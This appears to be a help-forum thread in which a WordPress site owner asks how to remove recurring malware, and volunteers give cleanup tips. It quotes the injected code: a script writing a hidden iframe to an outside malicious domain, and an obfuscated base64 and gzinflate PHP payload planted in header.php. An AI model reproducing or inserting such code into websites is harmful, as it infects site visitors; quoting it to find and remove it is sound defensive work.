Hi Guys I am having some real difficulty removing a virus on my wordpress site. It goes by the name "oxsanasiberians". I can still access the admin so it must by on the front end somewhere.
I have checked index.php files and theme_config etc to no avial. I know these virus' must make use of known a loop-whole and if anyone can help remove the virus it would be much appreciated.
my site is thebuxtedinn.co.uk
Kind Regards
Agus Setiawan answers:
remove this code on header.php ( before <head> code )
<script type="text/javascript">
document.write('<iframe src="http://oxsanasiberians.com/downloads/stats.php" name="Twitter" scrolling="auto" frameborder="no" align="center" height="2" width="2"></iframe>');
</script>
------------------
i think there's another code ( maybe in function.php ) that must be removed too. the code will check their code in header, that if removed, the page will not be loaded or error.
with your permission, please send me an access to your dashboard, i'll try to fix this
thank you.
-------------------
i think the site is working fine right now.
smwilson comments:
OK, I have removed a script from the header before and it seems to have returned. Although the code was written differently as:
<?php language_attributes();
#c3284d#
echo(gzinflate(base64_decode("JY5BDoIwEEX3JNyhmQ26oYlLpZzCCwztSMdA27SD4O0F2f285P//umIzJ1HyTWRAaBP9xg+eFPq6ctEuMwVp18xCl6bjV8aZVMnWgBdJd63jVjBg4YEyYyitjbN2cQ1TRFd0EZTSJp9Ahb1p4LmyCGVQ+0ucJg6jAVwkgvpPDzE7ygbCDnDiMRiwu8BR8MSjFwM3UCs78UfqO30q9c31UVedPt37Hw==")));
#/c3284d#
?>
Is there a php script which keeps adding code?
Sometimes I can access the homepage othertimes I cannot. So i dont know if the virus is running a script which automatically re-adds something to the header.php but the Javascript appears not to be visible within the header.php rather something else
I have removed this new code but I am worried it will come back.
I can now re-access the homepage however when I try accessing any pages within the navigation bar I get a 404 error page.
Thank you for your help.
Jatin Soni answers:
I can see your homepge but not other pages. Only one js text is on the header document.write(''); xml:lang="en">
That may be you need to complete the code.
Nilesh shiragave answers:
Hi
Please check your themes all PHP file for virus code. Also check wp-config.php , index.php and wp-app.php file from root folder for virus code.
Thanks